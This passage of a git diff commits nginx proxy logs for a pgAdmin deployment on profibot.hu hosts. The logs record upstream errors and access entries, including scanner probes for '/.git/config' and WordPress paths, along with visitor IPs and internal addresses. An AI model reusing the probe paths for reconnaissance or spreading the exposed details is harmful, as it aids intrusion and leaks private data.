upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000005957 while reading upstream, client: 31.46.76.56, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 15:28:00 [warn] 264#264: *15484 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000005958 while reading upstream, client: 31.46.76.56, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/20 17:21:49 [warn] 209#209: *438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000000009 while reading upstream, client: 216.81.245.209, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.react.js?ver=91100", host: "db.profibot.hu" +2026/01/20 17:21:49 [warn] 208#208: *473 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000000010 while reading upstream, client: 216.81.245.209, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu" +2026/01/20 17:21:49 [warn] 207#207: *403 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000000011 while reading upstream, client: 216.81.245.209, server: db.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "db.profibot.hu" +2026/01/20 17:21:49 [warn] 209#209: *484 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000000012 while reading upstream, client: 216.81.245.209, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.21.0.2:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu" +2026/01/20 21:42:35 [error] 251#251: *6273 pgadmin-ui could not be resolved (2: Server failure), client: 204.76.203.25, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 08:23:21 [error] 292#292: *28382 pgadmin-ui could not be resolved (2: Server failure), client: 72.11.155.223, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu", referrer: "http://db.profibot.hu/" +2026/01/22 10:52:55 [error] 292#292: *28875 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 10:52:55 [error] 292#292: *28875 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 10:53:19 [error] 292#292: *28875 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 10:53:19 [error] 292#292: *28875 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 11:11:58 [error] 299#299: *28981 pgadmin-ui could not be resolved (2: Server failure), client: 37.76.14.132, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:11:59 [error] 299#299: *28981 pgadmin-ui could not be resolved (2: Server failure), client: 37.76.14.132, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:12:00 [error] 299#299: *28981 pgadmin-ui could not be resolved (2: Server failure), client: 37.76.14.132, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 11:12:01 [error] 299#299: *28984 pgadmin-ui could not be resolved (2: Server failure), client: 66.249.81.37, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:12:01 [error] 299#299: *28985 pgadmin-ui could not be resolved (2: Server failure), client: 66.249.81.36, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:12:01 [error] 299#299: *28986 pgadmin-ui could not be resolved (2: Server failure), client: 66.102.8.225, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:12:08 [error] 299#299: *28981 pgadmin-ui could not be resolved (2: Server failure), client: 37.76.14.132, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 11:39:13 [error] 301#301: *29044 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:39:14 [error] 301#301: *29044 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 11:39:14 [error] 301#301: *29044 pgadmin-ui could not be resolved (2: Server failure), client: 84.1.26.27, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 16:56:09 [error] 308#308: *33349 pgadmin-ui could not be resolved (2: Server failure), client: 142.44.161.179, server: db.profibot.hu, request: "GET / HTTP/1.1", host: "db.profibot.hu" +2026/01/22 22:44:55 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /browser/js/endpoints.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:5050/browser/js/endpoints.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/22 22:44:55 [error] 237#237: *106 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /tools/translations.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:5050/tools/translations.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/22 22:45:08 [error] 237#237: *106 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /browser/js/endpoints.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:5050/browser/js/endpoints.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login" +2026/01/22 22:45:08 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /tools/translations.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:5050/tools/translations.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login" +2026/01/22 22:45:23 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:45:23 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 22:45:25 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:45:25 [error] 237#237: *105 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 22:48:24 [error] 244#244: *144 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:48:25 [error] 244#244: *144 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 22:49:06 [error] 245#245: *145 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:53:06 [error] 263#263: *189 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:53:07 [error] 263#263: *189 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:53:07 [error] 263#263: *189 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 22:53:09 [error] 263#263: *189 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:53:09 [error] 263#263: *189 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 22:53:23 [error] 262#262: *190 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 22:53:23 [error] 271#271: *210 pgadmin-ui could not be resolved (2: Server failure), client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 23:07:43 [error] 300#300: *376 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 23:07:43 [error] 300#300: *376 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/22 23:07:44 [error] 300#300: *376 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.6:5050/", host: "db.profibot.hu" +2026/01/22 23:07:44 [error] 300#300: *376 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: db.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.6:5050/favicon.ico", host: "db.profibot.hu", referrer: "https://db.profibot.hu/" +2026/01/23 06:35:23 [warn] 326#326: *2521 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/74/0000000748 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.react.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/23 06:35:23 [warn] 326#326: *2522 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/74/0000000749 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/23 06:35:23 [warn] 326#326: *2516 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/75/0000000750 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/25 00:29:20 [warn] 375#375: *74376 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000034963 while reading upstream, client: 34.123.170.104, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.react.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/25 00:29:20 [warn] 376#376: *74377 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000034964 while reading upstream, client: 34.123.170.104, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.main.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/25 00:29:20 [warn] 374#374: *74375 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000034965 while reading upstream, client: 34.122.147.229, server: db.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/25 00:29:20 [warn] 375#375: *74378 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000034966 while reading upstream, client: 34.123.170.104, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.6:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/26 09:36:53 [warn] 230#230: *7018 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000002977 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/app.bundle.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/app.bundle.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/browser/" +2026/01/26 09:36:54 [warn] 231#231: *7041 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000002978 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/sqleditor.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +2026/01/27 08:07:13 [warn] 230#230: *6475 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000002973 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/app.bundle.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.9:80/static/js/generated/app.bundle.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/browser/" +2026/01/27 08:07:14 [warn] 231#231: *6510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000002974 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.9:80/static/js/generated/sqleditor.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +2026/01/27 08:07:15 [warn] 231#231: *6491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000002975 while reading upstream, client: 84.1.26.27, server: db.profibot.hu, request: "GET /static/js/generated/fonts/SourceCodePro-Regular..ttf HTTP/1.1", upstream: "http://172.18.0.9:80/static/js/generated/fonts/SourceCodePro-Regular..ttf", host: "db.profibot.hu", referrer: "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +2026/01/28 23:33:52 [warn] 331#331: *33175 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000014241 while reading upstream, client: 37.76.10.148, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.18.0.9:80/static/js/generated/vendor.others.js?ver=91100", host: "db.profibot.hu", referrer: "https://db.profibot.hu/login?next=/" +2026/01/31 18:45:48 [warn] 261#261: *4385 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/76/0000000765 while reading upstream, client: 204.76.203.25, server: db.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/vendor.sqleditor.js", host: "db.profibot.hu" +2026/01/31 18:45:48 [warn] 261#261: *4388 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/76/0000000766 while reading upstream, client: 204.76.203.25, server: db.profibot.hu, request: "GET /static/js/generated/vendor.main.js HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/vendor.main.js", host: "db.profibot.hu" +2026/01/31 18:45:48 [warn] 262#262: *4389 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/76/0000000767 while reading upstream, client: 204.76.203.25, server: db.profibot.hu, request: "GET /static/js/generated/vendor.others.js HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/vendor.others.js", host: "db.profibot.hu" +2026/01/31 18:45:48 [warn] 263#263: *4390 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/76/0000000768 while reading upstream, client: 204.76.203.25, server: db.profibot.hu, request: "GET /static/js/generated/vendor.react.js HTTP/1.1", upstream: "http://172.18.0.8:80/static/js/generated/vendor.react.js", host: "db.profibot.hu" diff --git a/proxy-manager/data/logs/proxy-host-1_error.log.1.gz b/proxy-manager/data/logs/proxy-host-1_error.log.1.gz new file mode 100755 index 0000000..64b8cf3 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_error.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-1_error.log.2.gz b/proxy-manager/data/logs/proxy-host-1_error.log.2.gz new file mode 100755 index 0000000..6601345 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_error.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-1_error.log.3.gz b/proxy-manager/data/logs/proxy-host-1_error.log.3.gz new file mode 100755 index 0000000..5343061 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-1_error.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_access.log b/proxy-manager/data/logs/proxy-host-2_access.log new file mode 100755 index 0000000..3a90d58 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-2_access.log @@ -0,0 +1,309 @@ +[11/Jan/2026:22:51:35 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 37.76.14.85] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[11/Jan/2026:22:51:36 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 37.76.14.85] [Length 2493] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[11/Jan/2026:22:51:37 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 37.76.14.85] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[11/Jan/2026:22:51:37 +0000] - 302 302 - GET https dev.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.14.85] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[11/Jan/2026:22:51:37 +0000] - 200 200 - GET https dev.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.14.85] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[11/Jan/2026:22:51:37 +0000] - 200 200 - GET https dev.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.14.85] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:07:38:00 +0000] - 404 404 - GET https dev.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" "-" +[12/Jan/2026:08:45:56 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 143.198.39.172] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 143.198.39.172] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//xmlrpc.php?rsd" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 143.198.39.172] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:57 +0000] - 404 404 - GET https dev.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:58 +0000] - 404 404 - GET https dev.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:59 +0000] - 404 404 - GET https dev.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:59 +0000] - 404 404 - GET https dev.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:59 +0000] - 404 404 - GET https dev.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:59 +0000] - 404 404 - GET https dev.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 143.198.39.172] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:08:45:59 +0000] - - 400 - - https dev.profibot.hu "-" [Client 143.198.39.172] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[12/Jan/2026:11:33:10 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 37.76.11.76] [Length 205] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) 